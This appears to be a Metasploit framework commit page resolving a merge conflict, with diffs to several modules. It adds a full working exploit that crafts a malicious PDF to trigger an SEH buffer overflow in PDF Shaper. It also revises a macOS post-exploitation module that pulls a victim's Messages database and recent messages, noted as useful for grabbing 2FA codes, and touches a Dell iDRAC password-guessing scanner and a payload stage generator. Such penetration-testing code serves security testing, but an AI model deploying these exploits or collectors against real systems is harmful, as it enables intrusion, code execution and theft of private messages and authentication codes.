Resolve merge conflict

bug/bundler_fix
wchen-r7 2016-11-30 14:33:23 -06:00
commit 56505d2cc1
5 changed files with 172 additions and 95 deletions

View File

@ -138,7 +138,7 @@ class Msf::Payload::UUID
raise ArgumentError, "Raw UUID must be at least 16 bytes"
end
puid, plat_xor, arch_xor, plat_id, arch_id, tstamp = raw.unpack('A8C4N')
puid, plat_xor, arch_xor, plat_id, arch_id, tstamp = raw.unpack('a8C4N')
plat = find_platform_name(plat_xor ^ plat_id)
arch = find_architecture_name(arch_xor ^ arch_id)
time_xor = [plat_xor, arch_xor, plat_xor, arch_xor].pack('C4').unpack('N').first

View File

@ -77,6 +77,7 @@ class MetasploitModule < Msf::Auxiliary
password: pass,
proof: auth.body.to_s
)
return :next_user
else
print_error("#{target_url} - Dell iDRAC - Failed to login as '#{user}' with password '#{pass}'")
end

View File

@ -0,0 +1,121 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'PDF Shaper Buffer Overflow',
'Description' => %q{
PDF Shaper is prone to a security vulnerability when processing PDF files.
The vulnerability appear when we use Convert PDF to Image and use a specially
crafted PDF file. This module has been tested successfully on Win Xp, Win 7,
Win 8, Win 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom27[at]gmail.com - twitter.com/m3tac0m', # POC
'metacom' # MSF Module
],
'References' =>
[
['URL', 'https://www.exploit-db.com/exploits/37760/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process', # none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true
},
'Targets' =>
[
['<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>',
{
'Ret' => 0x00402AC1, # PDFTools.exe
'Offset' => 433
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 03 2015',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('FILENAME', [false, 'The file name.', 'msf.pdf'])
], self.class
)
end
def exploit
file_create(make_pdf)
end
def jpeg
buffer = "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00"
buffer << "\x00\x02\xFF\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02"
buffer << "\x02\x03\x02\x02\x02\x03\x04\x03\x03\x03\x03\x04\x05\x04\x04\x04"
buffer << "\x04\x04\x05\x05\x05\x05\x05\x05\x05\x05\x05\x05\x07\x08\x08\x08"
buffer << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C"
buffer << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x03\x02\x02\x03\x03\x03\x07\x05"
buffer << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C"
buffer << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E"
buffer << "\x0E\x0E\x0C\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
buffer << "\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xC0\x00\x14\x08\x00\x32\x00"
buffer << "\xE6\x04\x01\x11\x00\x02\x11\x01\x03\x11\x01\x04\x11\x00\xFF\xC4"
buffer << "\x01\xA2\x00\x00\x00\x07\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01"
buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00"
buffer << "\x01\x00\x02\x03\x04\x05\x06\x07"
buffer << rand_text(target['Offset']) # junk
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
buffer << rand_text(2388 - payload.encoded.length)
buffer
end
def make_pdf
@pdf << header
add_object(1, "<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>")
add_object(2, "<</Type/Outlines>>")
add_object(3, "<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>")
add_object(4, "[/PDF/Text/ImageC]")
add_object(5, "<</Type/Page/Parent 3 0 R/Contents 6 0 R>>")
stream_1 = "stream" << eol
stream_1 << "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
stream_1 << "endstream" << eol
add_object(6, "<</Length 91>>#{stream_1}")
stream = "<<" << eol
stream << "/Width 230" << eol
stream << "/BitsPerComponent 8" << eol
stream << "/Name /X" << eol
stream << "/Height 50" << eol
stream << "/Intent /RelativeColorimetric" << eol
stream << "/Subtype /Image" << eol
stream << "/Filter /DCTDecode" << eol
stream << "/Length #{jpeg.length}" << eol
stream << "/ColorSpace /DeviceCMYK" << eol
stream << "/Type /XObject" << eol
stream << ">>"
stream << "stream" << eol
stream << jpeg << eol
stream << "endstream" << eol
add_object(7, stream)
finish_pdf
end
end

View File

@ -82,6 +82,6 @@ module MetasploitModule
def generate_stage(opts = {})
opts[:uuid] ||= generate_payload_uuid
MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', opts.slice(:uuid, :url, :debug, :log_file)).
to_bininary :process_image
to_binary :process_image
end
end

View File

@ -14,20 +14,20 @@ class MetasploitModule < Msf::Post
'Description' => %q{
This module will collect the Messages sqlite3 database files and chat logs
from the victim's machine. There are four actions you may choose: DBFILE,
READABLE, LATEST and ALL. DBFILE and READABLE will retrieve all messages and
LATEST will retrieve the last X number of message (useful with 2FA). Module
was tested with OSX 10.11 (El Capitan).
READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and
LATEST will retrieve the last X number of messages (useful with 2FA). Module
was tested with OS X 10.11 (El Capitan).
},
'License' => MSF_LICENSE,
'Author' => [ 'Geckom <geckom[at]redteamr.com>'],
'Platform' => [ 'osx' ],
'SessionTypes' => [ "meterpreter", "shell" ],
'Author' => ['Geckom <geckom[at]redteamr.com>'],
'Platform' => ['osx'],
'SessionTypes' => ['meterpreter', 'shell'],
'Actions' =>
[
['DBFILE', { 'Description' => 'Collect messages DB file' } ],
['READABLE', { 'Description' => 'Collect messages DB and download in a readable format' } ],
['LATEST', { 'Description' => 'Collect the latest message' } ],
['ALL', { 'Description' => 'Collect all messages data'}]
['DBFILE', 'Description' => 'Collect Messages DB file'],
['READABLE', 'Description' => 'Collect Messages DB and download in a readable format'],
['LATEST', 'Description' => 'Collect the latest message'],
['ALL', 'Description' => 'Collect all Messages data']
],
'DefaultAction' => 'ALL'
))
@ -35,10 +35,42 @@ class MetasploitModule < Msf::Post
register_options(
[
OptInt.new('MSGCOUNT', [false, 'Number of latest messages to retrieve.', 3]),
OptString.new('USER', [false, 'Username to retrieve messages from (defaults to current user)', 'CURRENT'])
], self.class)
OptString.new('USER', [false, 'Username to retrieve messages from (defaults to current user)'])
]
)
end
def run
if datastore['USER']
user = datastore['USER']
else
user = cmd_exec('/usr/bin/whoami')
end
# Check file exists
messages_path = "/Users/#{user}/Library/Messages/chat.db"
if file_exist?(messages_path)
print_good("#{peer} - Messages DB found: #{messages_path}")
else
fail_with(Failure::Unknown, "#{peer} - Messages DB does not exist")
end
# Check messages. And then set the default profile path
unless messages_path
fail_with(Failure::Unknown, "#{peer} - Unable to find messages, will not continue")
end
print_good("#{peer} - Found Messages file: #{messages_path}")
files = []
# Download file
files << get_db(messages_path) if action.name =~ /ALL|DBFILE/i
files << readable(messages_path) if action.name =~ /ALL|READABLE/i
files << latest(messages_path) if action.name =~ /ALL|LATEST/i
save(files)
end
#
# Collect messages db file.
@ -49,7 +81,6 @@ class MetasploitModule < Msf::Post
{filename: 'messages.db', mime: 'bin', data: message_data}
end
#
# Generate a readable version of the messages DB
#
@ -68,7 +99,7 @@ class MetasploitModule < Msf::Post
'ORDER BY m.date;'
]
sql = sql.join(' ')
readable_data = exec_shell_cmd("sqlite3 #{messages_path} '#{sql}'")
readable_data = cmd_exec("sqlite3 #{messages_path} '#{sql}'")
{filename: 'messages.txt', mime: 'text/plain', data: readable_data}
end
@ -90,7 +121,7 @@ class MetasploitModule < Msf::Post
"ORDER BY m.date DESC LIMIT #{datastore['MSGCOUNT']};"
]
sql = sql.join(' ')
latest_data = exec_shell_cmd("sqlite3 #{messages_path} '#{sql}'")
latest_data = cmd_exec("sqlite3 #{messages_path} '#{sql}'")
print_good("#{peer} - Latest messages: \n#{latest_data}")
{filename: 'latest.txt', mime: 'text/plain', data: latest_data}
end
@ -112,80 +143,4 @@ class MetasploitModule < Msf::Post
end
end
#
# Return an array or directory names
#
def dir(path)
results = []
subdirs = exec_shell_cmd("ls -l #{path}")
unless subdirs =~ /No such file or directory/
results = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d\:]+\x20(.+)$/).flatten
end
results
end
#
# This is just a wrapper for cmd_exec(), except it chomp() the output,
# and retry under certain conditions.
#
def exec_shell_cmd(cmd)
begin
out = cmd_exec(cmd).chomp
rescue ::Timeout::Error => e
vprint_error("#{peer} - #{e.message} - retrying...")
retry
rescue EOFError => e
vprint_error("#{peer} - #{e.message} - retrying...")
retry
end
end
#
def locate_messages(base)
dir(base).each do |folder|
m = folder.match(/(Messages)$/)
if m
m = m[0].gsub(/\x20/, "\\\\ ") + "/"
return "#{base}#{m}"
end
end
nil
end
def run
if datastore['USER'] == 'CURRENT'
user = exec_shell_cmd("/usr/bin/whoami")
else
user = datastore['USER']
end
# Check file exists
messages_path = "/Users/#{user}/Library/Messages/chat.db"
if file_exist?(messages_path)
print_good("#{peer} - Messages DB found: #{messages_path}")
else
fail_with(Failure::Unknown, "#{peer} - Messages DB does not exist")
end
# Check messages. And then set the default profile path
unless messages_path
fail_with(Failure::Unknown, "#{peer} - Unable to find messages, will not continue")
end
print_good("#{peer} - Found messages file: #{messages_path}")
files = []
# Download file
files << get_db(messages_path) if action.name =~ /ALL|DBFILE/i
files << readable(messages_path) if action.name =~ /ALL|READABLE/i
files << latest(messages_path) if action.name =~ /ALL|LATEST/i
save(files)
end
end